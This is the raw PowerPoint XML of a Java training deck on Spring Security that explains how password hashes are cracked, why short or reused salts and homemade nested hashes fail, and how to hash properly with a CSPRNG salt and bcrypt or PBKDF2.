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5"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId86"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="316" r:id="rId5"/>
    <p:sldId id="431" r:id="rId6"/>
    <p:sldId id="432" r:id="rId7"/>
    <p:sldId id="433" r:id="rId8"/>
    <p:sldId id="434" r:id="rId9"/>
    <p:sldId id="435" r:id="rId10"/>
    <p:sldId id="436" r:id="rId11"/>
    <p:sldId id="437" r:id="rId12"/>
    <p:sldId id="438" r:id="rId13"/>
    <p:sldId id="439" r:id="rId14"/>
    <p:sldId id="440" r:id="rId15"/>
    <p:sldId id="441" r:id="rId16"/>
    <p:sldId id="442" r:id="rId17"/>
    <p:sldId id="443" r:id="rId18"/>
    <p:sldId id="444" r:id="rId19"/>
    <p:sldId id="445" r:id="rId20"/>
    <p:sldId id="446" r:id="rId21"/>
    <p:sldId id="447" r:id="rId22"/>
    <p:sldId id="448" r:id="rId23"/>
    <p:sldId id="449" r:id="rId24"/>
    <p:sldId id="451" r:id="rId25"/>
    <p:sldId id="450" r:id="rId26"/>
    <p:sldId id="452" r:id="rId27"/>
    <p:sldId id="453" r:id="rId28"/>
    <p:sldId id="454" r:id="rId29"/>
    <p:sldId id="455" r:id="rId30"/>
    <p:sldId id="457" r:id="rId31"/>
    <p:sldId id="456" r:id="rId32"/>
    <p:sldId id="458" r:id="rId33"/>
    <p:sldId id="459" r:id="rId34"/>
    <p:sldId id="460" r:id="rId35"/>
    <p:sldId id="461" r:id="rId36"/>
    <p:sldId id="462" r:id="rId37"/>
    <p:sldId id="463" r:id="rId38"/>
    <p:sldId id="464" r:id="rId39"/>
    <p:sldId id="465" r:id="rId40"/>
    <p:sldId id="476" r:id="rId41"/>
    <p:sldId id="477" r:id="rId42"/>
    <p:sldId id="466" r:id="rId43"/>
    <p:sldId id="467" r:id="rId44"/>
    <p:sldId id="468" r:id="rId45"/>
    <p:sldId id="470" r:id="rId46"/>
    <p:sldId id="471" r:id="rId47"/>
    <p:sldId id="472" r:id="rId48"/>
    <p:sldId id="469" r:id="rId49"/>
    <p:sldId id="473" r:id="rId50"/>
    <p:sldId id="474" r:id="rId51"/>
    <p:sldId id="475" r:id="rId52"/>
    <p:sldId id="478" r:id="rId53"/>
    <p:sldId id="479" r:id="rId54"/>
    <p:sldId id="403" r:id="rId55"/>
    <p:sldId id="404" r:id="rId56"/>
    <p:sldId id="407" r:id="rId57"/>
    <p:sldId id="408" r:id="rId58"/>
    <p:sldId id="405" r:id="rId59"/>
    <p:sldId id="409" r:id="rId60"/>
    <p:sldId id="410" r:id="rId61"/>
    <p:sldId id="406" r:id="rId62"/>
    <p:sldId id="411" r:id="rId63"/>
    <p:sldId id="412" r:id="rId64"/>
    <p:sldId id="413" r:id="rId65"/>
    <p:sldId id="414" r:id="rId66"/>
    <p:sldId id="415" r:id="rId67"/>
    <p:sldId id="416" r:id="rId68"/>
    <p:sldId id="417" r:id="rId69"/>
    <p:sldId id="425" r:id="rId70"/>
    <p:sldId id="418" r:id="rId71"/>
    <p:sldId id="419" r:id="rId72"/>
    <p:sldId id="420" r:id="rId73"/>
    <p:sldId id="421" r:id="rId74"/>
    <p:sldId id="422" r:id="rId75"/>
    <p:sldId id="423" r:id="rId76"/>
    <p:sldId id="424" r:id="rId77"/>
    <p:sldId id="426" r:id="rId78"/>
    <p:sldId id="430" r:id="rId79"/>
    <p:sldId id="427" r:id="rId80"/>
    <p:sldId id="428" r:id="rId81"/>
    <p:sldId id="429" r:id="rId82"/>
    <p:sldId id="339" r:id="rId83"/>
    <p:sldId id="364" r:id="rId84"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="6858000" cy="9144000"/>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9" d="100"/>
          <a:sy n="89" d="100"/>
        </p:scale>
        <p:origin x="1310"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gs" Target="tags/tag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2019-12-20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12/20/2019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Application Delivery Fundamentals 2.0 B:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Java</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Spring Security</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248275"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How Hashes are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cracked</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Lookup </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>Tables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lookup tables are an extremely effective method for cracking many hashes of the same type very quickly. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>general idea is to pre-compute the hashes of the passwords in a password dictionary and store them, and their corresponding password, in a lookup table data structure. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>good implementation of a lookup table can process hundreds of hash lookups per second, even when they contain many billions of hashes.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"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42548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209675"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How Hashes are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cracked</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Lookup </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>Tables</a:t>
            </a:r>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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="21666" t="29150" r="17500" b="57566"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="533401" y="2667000"/>
            <a:ext cx="8132896" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2479446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7500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How Hashes are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cracked</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The WRONG Way: Short Salt &amp; Salt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reuse</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Salt Reuse</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A common mistake is to use the same salt in each hash. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Either </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the salt is hard-coded into the program, or is generated randomly once. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is ineffective because if two users have the same password, they'll still have the same hash. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>An </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>attacker can still use a reverse lookup table attack to run a dictionary attack on every hash at the same time. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>They </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>just have to apply the salt to each password guess before they hash it. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the salt is hard-coded into a popular product, lookup tables and rainbow tables can be built for that salt, to make it easier to crack hashes generated by the product.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="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3850346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0000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Short </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Salt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the salt is too short, an attacker can build a lookup table for every possible salt. For example, if the salt is only three ASCII characters, there are only 95x95x95 = 857,375 possible salts. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>That </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>may seem like a lot, but if each lookup table contains only 1MB of the most common passwords, collectively they will be only 837GB, which is not a lot considering 1000GB hard drives can be bought for under $100 today</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For the same reason, the username shouldn't be used as a salt. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Usernames </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>may be unique to a single service, but they are predictable and often reused for accounts on other services. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>An </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>attacker can build lookup tables for common usernames and use them to crack username-salted hashes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>make it impossible for an attacker to create a lookup table for every possible salt, the salt must be long. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>good rule of thumb is to use a salt that is the same size as the output of the hash function. For example, the output of SHA256 is 256 bits (32 bytes), so the salt should be at least 32 random bytes.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>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145755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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The WRONG Way: Double Hashing &amp; Wacky Hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Here are some examples of poor wacky hash functions I've seen suggested in forums on the internet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>md5(sha1(password))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>md5(md5(salt) + md5(password))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>sha1(sha1(password))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>sha1(str_rot13(password + salt))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>md5(sha1(md5(md5(password) + sha1(password)) + md5(password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Do not use any of these.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>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472100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92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The RIGHT Way: How to Hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Properly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Salt should be generated using a Cryptographically Secure Pseudo-Random Number Generator (CSPRNG). </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CSPRNGs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>are very different than ordinary pseudo-random number generators, like the "C" language's rand() function. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>As </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the name suggests, CSPRNGs are designed to be cryptographically secure, meaning they provide a high level of randomness and are completely unpredictable. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>don't want our salts to be predictable, so we must use a CSPRNG. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="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3252549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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>java.lang.Object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  extended by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>java.util.Random</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>      extended by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>java.security.SecureRandom</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SecureRandom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> random = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SecureRandom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>      byte bytes[] = new byte[20];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>random.nextBytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(bytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="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2445297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92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To Store a Password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Generate a long random salt using a CSPRNG.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prepend the salt to the password and hash it with a standard password hashing function like Argon2, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bcrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>scrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, or PBKDF2.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Save both the salt and the hash in the user's database record</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To Validate a Password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Retrieve the user's salt and hash from the database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prepend the salt to the given password and hash it using the same hash function.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Compare the hash of the given password with the hash from the database. If they match, the password is correct. Otherwise, the password is incorrect.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="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321040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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Making Password Cracking Harder: Slow Hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use a standard algorithm like PBKDF2 or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bcrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="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146686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a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hashing Passwords in Java with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Bcrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>BCrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a one way salted hash function based on the Blowfish cipher. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>provides several enhancements over plain text </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>passwords.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="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48940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User </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>credentials are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>sent in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>clear / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>easy to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>decode format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Apply Salted Hash technique on the password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Session </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Fixation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Follow a secure session </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>management lifecycle </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>which </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>includes proper initialization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, maintenance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, authentication and termination </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of the session token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Header </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>should </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SERVER_NAME instead of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the Host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>header.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>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349007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172075"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>BCrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> features</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Not plain text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - Not only do plain text passwords compromise your website if the database is breached but they can also compromise other websites for the users. Unfortunately a lot of users share passwords across websites.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>One way hashing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>BCrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a one way hash function to obfuscate the password such that it is not stored in plain text.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Salted hashing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - Generating random bytes (the salt) and combining it with the password before hashing creates unique hashes across each users password. If two users have the same password they will not have the same password hash. This is to prevent rainbow table attacks which can reverse hashed passwords using common hashing functions that do not utilize a salt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Logarithmic iterations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - The hashing function is executed many times sequentially which can be increased exponentially known as key stretching. This is to make the function CPU intensive which makes it more secure against brute force attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
